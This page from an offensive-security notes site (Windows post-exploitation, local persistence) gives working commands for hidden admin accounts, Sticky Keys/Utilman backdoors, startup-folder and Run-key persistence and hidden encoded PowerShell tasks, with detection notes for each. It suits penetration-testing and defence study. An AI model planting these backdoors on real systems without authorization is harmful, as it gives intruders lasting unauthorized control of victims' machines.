InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Local Administrator account
  • Sticky Keys or Utilman backdoors
  • Windows startup folders
  • ASEP registry keys
  • Scheduled tasks
  • Windows services
  • WMI subscription
  • DLL hijacking
  • References
  1. Windows
  2. Post exploitation

Local persistence

PreviousDefense evasionNextLateral movements

Last updated 3 years ago

A number of techniques can be employed to maintain persistence on a Windows system, with the goal of maintaining access on the systems across restarts or other forms of interruption. For a more comprehensive list of the persistence that can be employed, refer to the entry for persistence in the .

Some of the techniques mentioned below can be accomplished through Cobalt Strike's execute-assembly (or ) using the C# utility.

The forensics artefacts left by (some) of the persistence techniques detailed below are detailed in the [DFIR] Windows - TTPs analysis - Local persistence note.

Local Administrator account

ATT&CK
Persistence type
Privilege level required
Monitoring possibilities

Remote access.

Administrator.

Windows default Security events. Windows API monitoring.

The following net user commands can be used to create and add a local account to the local Administrators group (directly or periodically through a Scheduled Task):

# Creates a new account.
net user /add <USERNAME> <PASSWORD>

# Adds account as administrator.
net localgroup Administrators <USERNAME> /add
net localgroup Administrateurs <USERNAME> /add

# Define a scheduled task that will create a local user and add it to the local Administrator group every <MODIFIER>.
# The <PERIODICITY> depends on the periodicity chosen (minute, hourly, daily, weekly, or monthly): 1 - 1439 for minutes, 1 - 23 for hours, 1 - 365 for days, 1 - 52 for weeks or 1 - 12 for months.
# To avoid a warning on the password length (that may require an user interaction), the password specified should be shorter than 14 characters.
schtasks /create /tn "<TASK_NAME>" /tr "cmd /c net user <USERNAME> <PASSWORD> /add && net localgroup Administrators <USERNAME> /add" /sc <minute | hourly | daily | weekly | monthly> /mo <PERIODICITY> /RU "NT AUTHORITY\SYSTEM"

Sticky Keys or Utilman backdoors

ATT&CK
Persistence type
Privilege level required
Monitoring possibilities

Remote access.

Administrator.

Non default specific DACL on the sethc.exe and utilman.exe files to raise alert upon modification. Windows API monitoring.

Both the Sticky Keys (sethc.exe) and Utilman (utilman.exe) utilities can be launched at the login screen before authentication as NT AUTHORITY\SYSTEM. A graphical access to the host login prompt is needed in order to make use of this backdoor mechanism. Indeed, to remotely leverage persistence through Sticky Keys or Utilman:

  • RDP must be enabled and the RDP service accessible remotely over the network. Refer to the Activate RDP and Windows Firewall sections of the present note to active RDP and configure a rule allowing inbound RDP access on the local host.

  • The RDP's Network Level Authentication (NLA) security mechanism must be deactivated if no valid credentials are known.

To access a host remotely in RDP, the user used must have the SeRemoteInteractivePrivilege, granted by default to the members of the Remote Desktop Users local group of the host. The following net localgroup commands can be used to add the specified user in this group:

net localgroup "Remote Desktop Users" <USERNAME> /add
net localgroup "Utilisateurs du Bureau à distance" <USERNAME> /add

# Connect in RDP from Linux
rdesktop -k fr -g 90% -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>' <HOSTNAME | IP>

The sethc.exe is launched after pushing the Maj key five times and the utilman.exe can be started using the Win + U keys.

copy %ComSpec% %SystemRoot%\System32\sethc.exe
copy %ComSpec% %SystemRoot%\System32\utilman.exe

Windows startup folders

ATT&CK
Persistence type
Privilege level required
Monitoring possibilities

Code execution.

User or Administrator depending on the startup folders targeted.

Non default specific DACL on the startup folders files to raise alert upon file creation. Periodic review / validation of the startup folders entries. Windows API monitoring.

The Windows startup folders contains shortcut links (.lnk) that will be executed upon any user log in (All Users start up folder) or when the associated user logs in (Current Users start up folders).

The startup folders are located at the following paths:

# All Users startup folder.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

# Current Users startup folders.
C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

A shortcut link file can be created manually through the Windows Explorer:

# In the folder in which the shortcut link should be created:
Right click -> New -> Shortcut -> Enter the <BINARY_PATH> and eventual <ARGUMENTS> -> Next -> Enter the shortcut link file name <LNK_FILE_NAME> -> Finish

# The appearance and comportment of the created shortcut link can be customized:
Right click on the shortcut link file -> Properties
  -> Eventually specify a custom folder path as needed -> Start in: <DIRECTORY_FULL_PATH>
  -> Run: Minimized
  -> Change Icon... -> Select icon displayed for the file.

PowerShell can also be used to create and customize a shortcut link file:

$WShell = New-Object -ComObject WScript.Shell
$Shortcut = $WShell.CreateShortcut("<LNK_FILE_NAME>")
$Shortcut.TargetPath = "<BINARY_PATH>"
$Shortcut.Arguments = "<ARGUMENTS>"
$Shortcut.WorkingDirectory = "<DIRECTORY_FULL_PATH>"
$Shortcut.IconLocation = "<ICON_FILE_PATH>"
# 7 = Minimized window.
$Shortcut.WindowStyle = 7
$Shortcut.Save()

SharPersist supports persistence techniques through the current user's startup folder. SharPersist presents the advantage of performing timestomping on the created shortcut link file and setting the file icon to Internet Explorer for increased stealth.

# Lists the entries in the current user startup folder.
SharPersist.exe -t startupfolder -m list

# Adds a lnk file in the current user startup folder executing the specified executable.
SharPersist -t startupfolder -c "<BINARY_PATH>" [-a "<ARGUMENTS>"] -f "<LNK_FILE_NAME>" -m add

# Removes the specified startup folder entry.
SharPersist.exe -t startupfolder -f "<LNK_FILE_NAME>" -m remove

ASEP registry keys

ATT&CK
Persistence type
Privilege level required
Monitoring possibilities

Code execution.

User or Administrator.

Windows default Microsoft-Windows-Shell-Core%4Operational.evtx events for the Run / RunOnce registry keys (starting from Windows 10 and Windows Server 2016). Non default specific DACL on ASEP registry keys to raise alerts upon operations on the keys (Create Subkey, Set Value, ...). Periodic review / validation of the ASEP registry keys configured. Windows API monitoring.

A number of registry keys, known as Auto-Start Extensibility Points (ASEP) registry keys, are run whenever the system is booted or a specific user logs in. The ASEP keys under HKEY_LOCAL_MACHINE (HKLM) are run every time the system is started, while the ASEP keys under HKEY_CURRENT_USER (HKCU) are only executed when the user associated with the keys logs on to the system.

For more information on ASEP keys, including a more comprehensive list of ASEP registry keys, refer to the [DFIR] Windows - TTPs analysis - Local persistence note (ASEP registry keys section).

RunOnce / Run / RunOnceEx

Among the most well known ASEP keys, entries in the RunOnce and Run keys are executed respectively once or at every trigger (system startup or user logging depending on the keys being in HKLM or HKCU).

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SharPersist supports persistence techniques through a number of ASEP keys, specified with the -k "<KEY_SPECIFIER>" parameter:

  • hklmrun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  • hklmrunonce: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • hklmrunonceex: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

  • hkcurun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

  • hkcurunonce: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

  • logonscript: HKCU\Environment\, key name UserInitMprLogonScript. Windows logon script executed at logon, that can be set at a domain level. May overwrite a legitimate logon script.

  • stickynotes: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\, key name RESTART_STICKY_NOTES. Does not apply to Windows 10+. The RESTART_STICKY_NOTES registry key is set by the Sticky Notes utility to persist across reboot. The Sticky Notes utility re-set the RESTART_STICKY_NOTES key after being opened.

  • userinit: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, key name Userinit.

SharPersist -t reg [-o env] -c "<BINARY_PATH>" [-a "<ARGUMENTS>"] -k "<KEY_SPECIFIER>" -v "<KEY_NAME>" -m add

Scheduled tasks

ATT&CK
Persistence type
Privilege level required
Monitoring possibilities

Code execution.

User or Administrator.

Windows default Microsoft-Windows-TaskScheduler%4Operational.evtx events. Periodic review / validation of the Scheduled tasks configured. Windows API monitoring.

# <TASK_COMMAND> example with the Windows built-in cmd.exe or PowerShell:
cmd.exe /c '<COMMAND> <COMMAND_ARGS>' | %ComSpec% /c '<COMMAND> <COMMAND_ARGS>'
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -C '<COMMAND> <COMMAND_ARGS>'
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc <ENCODED_BASE64_CMD>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Enc <ENCODED_BASE64_CMD>

# Create a scheduled task to run PowerShell code for example
schtasks /create /tn "<TASK_NAME>" /tr "<TASK_COMMAND>" /sc once /sd <MM/DD/YYYY> /st <HH:MM:SS> /V1 /Z /RU "NT AUTHORITY\SYSTEM" /S <IP | HOSTNAME>

# The creation and status of the scheduled task can be validated
schtasks /query /tn "<TASK_NAME>" /S <IP | HOSTNAME>
schtasks /run /tn "<TASK_NAME>" /S <IP | HOSTNAME>
schtasks /delete /tn "<TASK_NAME>" /S <IP | HOSTNAME>

Windows services

ATT&CK
Persistence type
Privilege level required
Monitoring possibilities

Code execution.

Administrator.

Windows default System.evtx and Security.evtx (since Windows Server 2016 and Windows 10) events. Periodic review / validation of the Services configured. Windows API monitoring.

WMI subscription

TODO

https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

DLL hijacking

TODO

https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/


References

https://github.com/mandiant/SharPersist/blob/master/Brett%20Hawkins%20SharPersist%20DerbyCon%202019.pdf

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://h4wkst3r.blogspot.com/2018/05/persistence-with-sticky-notes-registry.html

https://www.ired.team/offensive-security/persistence/windows-logon-helper

Winlogon registry keys:

MITRE ATT&CK matrices (TA0003)
InlineExecute-Assembly
SharPersist
T1136.001
T1546.008
T1547.001
T1547.001
T1547.004
T1053
T1543.003